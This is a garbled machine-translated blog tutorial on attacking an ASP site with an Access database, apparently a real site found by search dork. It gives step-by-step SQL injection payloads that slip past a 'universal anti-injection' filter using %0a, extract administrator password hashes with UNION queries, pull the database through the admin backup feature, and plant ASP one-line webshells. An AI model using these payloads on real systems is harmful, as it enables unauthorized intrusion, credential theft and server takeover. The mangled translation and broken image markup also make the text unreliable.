ACESSS Database Manual Bypass universal code anti-injection system

ACESSS Database Manual Bypass universal code Anti-injection system

by antian365 Remnant Maple Simeon

infiltration process is a variety of security technology to reproduce the process, the infiltration from SQL injection point Discovery to bypass SQL injection of common code of Anti-injection, can be said to open a door, through SQL injection to get the administrator password, get the database, if the conditions allow the case is fully accessible Webshell. In this paper, we also summarize the key technologies of Access database acquisition Webshell .

1.1 getting target information

through Baidu keyword "news.asp?id=" Search, in the search results randomly select a record, open 1 , test the site can be normal access, while in Firefox use F9 function key, open Hackbar

650) this.width=650; "Src=" https://s2.51cto.com/wyfs02/M02/96/3C/wKioL1keepqSVHmCAADcffi1ZKc028.jpg-wh_500x0-wm_ 3-wmp_4-s_1892292115.jpg "title=" Figure 1.jpg "style=" Float:none; "alt=" Wkiol1keepqsvhmcaadcffi1zkc028.jpg-wh_50 "/>

Figure 1 testing the target site

1.2 test for the presence of SQL injection

Randomly open a news link address in the http://www.xxxxx.com/website http://www.xxxxx.com/news.asp?id=1172 add it after its address and 1= 2 and and 1 = 1 Determine if there is an injection,as shown in 2, after clicking Execute , the page displays the existence of "SQL Universal anti-injection system".

650) this.width=650; "Src=" https://s2.51cto.com/wyfs02/M00/96/3C/wKiom1keepqj-l10AABxCL0tPgE140.jpg-wh_500x0-wm_ 3-wmp_4-s_2754517244.jpg "title=" Figure 2-there is a SQL Universal anti-injection system. JPG "style=" float:none; "alt=" Wkiom1keepqj-l10aabxcl0tpge140.jpg-wh_50 "/>

Figure 2 SQL Universal anti-injection system present

Add "0" and "/" after the website addresstotest, open "http://www.xxxxx.com/news.asp?id=1172/" browser display results 3 As shown inresult 4 after opening "http://www.xxxxx.com/news.asp?id=1172-0" , there is an obvious SQL injection.

650) this.width=650; "Src=" https://s2.51cto.com/wyfs02/M02/96/3C/wKioL1keeprApSDHAAD60N0ngXk529.jpg-wh_500x0-wm_ 3-wmp_4-s_616769823.jpg "title=" Figure 3 Test content changes 1.jpg "style=" Float:none; "alt=" Wkiol1keeprapsdhaad60n0ngxk529.jpg-wh_50 " />

Figure 3 shows no content

650) this.width=650; "Src=" https://s5.51cto.com/wyfs02/M00/96/3C/wKiom1keepux96dFAAEvd0VSf94003.jpg-wh_500x0-wm_ 3-wmp_4-s_1294328233.jpg "title=" Figure 4 test content changes 1.jpg "style=" Float:none; "alt=" wkiom1keepux96dfaaevd0vsf94003.jpg-wh_50 "/>

Figure 4 shows what's present

1.3 bypassing SQL anti-injection system

1.post Commit cannot bypass

in the in post data, enter and 1=1 and and 1=2, tick "Enable Post Data", click "Execute" to test,5 Shows no change to the result, stating that the direct post submission cannot be bypassed.

650) this.width=650; "Src=" https://s5.51cto.com/wyfs02/M00/96/3C/wKioL1keepuBsUGxAADVJpWr6Eg330.jpg-wh_500x0-wm_ 3-wmp_4-s_2104051821.jpg "title=" figure 5-post commit cannot bypass. jpg "style=" float:none; "alt=" Wkiol1keepubsugxaadvjpwr6eg330.jpg-wh_50 "/>

Figure 5 post submission cannot be bypassed

2. Replace space bypass

Change the Post mode or not, the friend said that using %09( that is, tab key) can be bypassed, tested or not,6 , with %0a(newline character) to replace the next space to successfully bypass, as shown in 7.

650) this.width=650; "Src=" https://s5.51cto.com/wyfs02/M01/96/3C/wKiom1keepuQ0VkMAAByyYRMvrk315.jpg-wh_500x0-wm_ 3-wmp_4-s_3456811855.jpg "title=" Figure 6 09 cannot bypass. jpg "style=" float:none; "alt=" Wkiom1keepuq0vkmaabyyyrmvrk315.jpg-wh_50 " />

Figure 6 Unable to bypass

650) this.width=650; "Src=" https://s1.51cto.com/wyfs02/M01/96/3C/wKioL1keepzA-c2UAADpckvGUKI716.jpg-wh_500x0-wm_ 3-wmp_4-s_1794001361.jpg "title=" Figure 7 successfully bypassed. jpg "style=" float:none; "alt=" wkiol1keepza-c2uaadpckvguki716.jpg-wh_50 "/ >

Figure 7 Successful bypass

1.4 getting database types and tables and fields

(1) determine the database type

through and (SelectCount (*) from sysobjects) >0 and and (select COUNT (*) from msysobjects) >0 Error message to determine the type of database used by the site. If the database is sql-serve, then the first one, the webpage must be running normally, the second is abnormal; if ACCESS is two, it will be abnormal. In POST by submitting in turn:

AND%0A (Select%0acount (*)%0afrom%0asysobjects) >0

AND%0A (Select%0acount (*)%0afrom%0amsysobjects) >0

The results show that "there is no content yet!" "The actual content should be id=1158 , and the result of the two statement execution is an exception, described as an access database."

(2) to determine the column name by ORDER by

Id=1172%0aorder%0aby%0a23 Normal

Id=1172%0aorder%0aby%0a24 Error

" Order by"Normal,"the number of column names for the query is a total of

(3) determine if the admin table exists

and (select COUNT (*) from admin) >0

AND%0A (Select%0acount (*)%0afrom%0aadmin) >0

(4) determine if the user and pass fields are present

and (select COUNT (username) fromadmin) >0

and (select count (password) fromadmin) >0

The transformed statement

and%0a (select%0acount (user)%0afrom%0aadmin) >0

AND%0A (Select%0acount (pass)%0afrom%0aadmin) >0

Test the admin table for UID,ID,uid error,8 shown ,ID Normal,9 shown .

650) this.width=650; "Src=" https://s1.51cto.com/wyfs02/M00/96/3C/wKioL1keepzDe43NAAD1WVLxiu0577.jpg-wh_500x0-wm_ 3-wmp_4-s_3925649994.jpg "title=" figure 8uid does not exist. jpg "style=" float:none; "alt=" Wkiol1keepzde43naad1wvlxiu0577.jpg-wh_50 " />

Figure 8uid does not exist

650) this.width=650; "Src=" https://s3.51cto.com/wyfs02/M01/96/3C/wKiom1keep3gWVjAAAFub-0uOHg073.jpg-wh_500x0-wm_ 3-wmp_4-s_708226877.jpg "title=" figure 9id exists. jpg "style=" float:none; "alt=" wkiom1keep3gwvjaaafub-0uohg073.jpg-wh_50 "/ >

Figure 9id exists

1.5 Get the Administrator password

Id=1158%0aunion%0aselect%0a1,2,3,4,user,pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%0afrom%0aadmin , get the password of the ADMIN-DH user "5ed9ff1d48e059b50db232f497b35b45",as shown, by logging in the background and found that the user rights are low, Therefore, you also need to obtain the password execution statements for other administrator users:

id=1158%0aunion%0aselect%0a1,2,3,4,user,pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%0afrom%0aadmin%0 Awhere%0aid=1, get the user passwordwith ID 1, as shown in each.

650) this.width=650; "Src=" https://s3.51cto.com/wyfs02/M02/96/3C/wKiom1keep2RyAA7AAFHKEAv_rc407.jpg-wh_500x0-wm_ 3-wmp_4-s_387067715.jpg "title=" Figure 10 admin password get. jpg "style=" float:none; "alt=" Wkiom1keep2ryaa7aafhkeav_rc407.jpg-wh_ "/>

Figure Ten getting the amdin-dh user password

650) this.width=650; "Src=" https://s3.51cto.com/wyfs02/M02/96/3C/wKioL1keep7DVF4kAAFWmW_h6Bo578.jpg-wh_500x0-wm_ 3-wmp_4-s_3752332979.jpg "title=" Figure 11 admin password get 2.jpg "style=" Float:none; "alt=" Wkiol1keep7dvf4kaafwmw_h6bo578.jpg-wh_ "/>

Figure One gets the administrator zzchxj user Password

1.6. Getting a database

(1) database backup related information acquisition

a database backup function exists in background management, as shown in. The backup page has information such as the current database path, the backup database directory, the backup database name, and so on.

650) this.width=650; "Src=" https://s3.51cto.com/wyfs02/M01/96/3C/wKioL1keep7gVEi-AAG6PnlhTfw547.jpg-wh_500x0-wm_ 3-wmp_4-s_3450508335.jpg "title=" Figure 12 backing up the database. jpg "style=" float:none; "alt=" Wkiol1keep7gvei-aag6pnlhtfw547.jpg-wh_50 " />

Figure database backup

(2) get the real database name by compressing function

Click Compress,as shown in, to get information such as the real name and path of the database. /data-2016/@@ zzfcthotfixz ###.asp".

650) this.width=650; "Src=" https://s3.51cto.com/wyfs02/M00/96/3C/wKiom1keep6BA2WHAADk7iiaTQI016.jpg-wh_500x0-wm_ 3-wmp_4-s_4082425233.jpg "title=" Figure 13 get the database real name and address. jpg "style=" float:none; "alt=" Wkiom1keep6ba2whaadk7iiatqi016.jpg-wh_50 "/>

Figure to get the real path and name information of the database

(3) back up and get the database

set the ".. /data-2016/@@ zzfcthotfixz ###.asp"Fill in the current database path, back up the database name"db1.mdb",as shown, the backup database succeeds, and the database path you backed up is server space: D:\virtualhost\*********\www\ahs*****admin\databackup\db1.mdb, the database is:

Http://www.xxxxx.com/ahszhdzzcadmin/Databackup/db1.mdb

650) this.width=650; "Src=" https://s5.51cto.com/wyfs02/M02/96/3C/wKiom1keep-Dr2peAADP_iyTFCA401.jpg-wh_500x0-wm_ 3-wmp_4-s_424293736.jpg "title=" Figure 14 backing up the database. jpg "style=" float:none; "alt=" wkiom1keep-dr2peaadp_iytfca401.jpg-wh_50 "/ >

image Backup Database

1.8access database Get Webshell method

(1) query Export method

Create table cmd (a varchar (50))

Insert into cmd (a) VALUES (' <%executerequest (CHR)%> ')

SELECT * into [a] in ' C:\wwwroot\1.asa;x.xls ' Excel 4.0; ' from cmd

drop table cmd

Direct Kitchen knife connection Http://www.antian365.com/1.asa;x.xls

(2) database backup

in the message, etc. can be written into the content of the place to insert "┼ disruptively 畣 choky longoza enemy Kozasa ∨≡┩ 愾", through the database backup to obtain a backdoor password of a.

(3) database image backup Access

will insert a word back door of the picture Wood immediately to the website, get the specific address of its picture, and then through the backup, the backup file is set to the location of the picture file, backup files such as designated as /databacp/1.asp to get Webshell .

1.9 Reference Articles

(1)http://www.freebuf.com/articles/web/36683.html, bypassing WAF to continue SQL injection Common methods

(2)http://www.cnblogs.com/joy-nick/p/5774462.html,sqlinjection bypass Technique

(3)http://www.antian365.com/forum.php?mod=viewthread&tid=1084&extra=, finishing the comparison of the whole accesssql Injection Reference

This article is from the "Simeon Technology column" blog, please be sure to keep this source http://simeon.blog.51cto.com/18680/1927496

ACESSS Database Manual Bypass universal code anti-injection system